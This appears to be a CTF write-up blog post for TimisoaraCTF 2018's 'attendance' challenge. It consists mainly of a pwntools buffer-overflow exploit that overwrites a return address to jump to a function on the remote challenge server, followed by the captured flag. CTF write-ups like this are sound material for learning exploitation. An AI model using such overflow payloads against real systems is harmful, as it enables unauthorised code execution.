CatPawn

Home Archives
2018-04-22

TimisoaraCTF2018-Attendance

Question

attendance

Solution

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

p = process("attendance")
p = remote("89.38.210.128", 31337)
vuln_func = 0x8048667

payload = "a"*48 + p32(vuln_func)

p.recvuntil("Call> ")
p.sendline("31337")

p.recvuntil("please:")
p.sendline(payload)
p.interactive()

Flag

1
timctf{l1ttl3_th1ngs_m4k3_b1g_th1ngs_h4pp3n}
Teilen
Neuer
TimisoaraCTF2018-ForeignLanguage
Älter
TimisoaraCTF2018-cparty

Archiv

  • September 2018
  • May 2018
  • April 2018
  • March 2018
  • January 2018
  • December 2017

letzter Beitrag

  • IceCTF2018-Drumbone
  • IceCTF2018-Lost-in-the-forest
  • IceCTF2018-HardShells
  • IceCTF2018-Anticaptcha
  • IceCTF2018-Pokeamango
© 2018 CatPawn
Powered by Hexo
Home Archives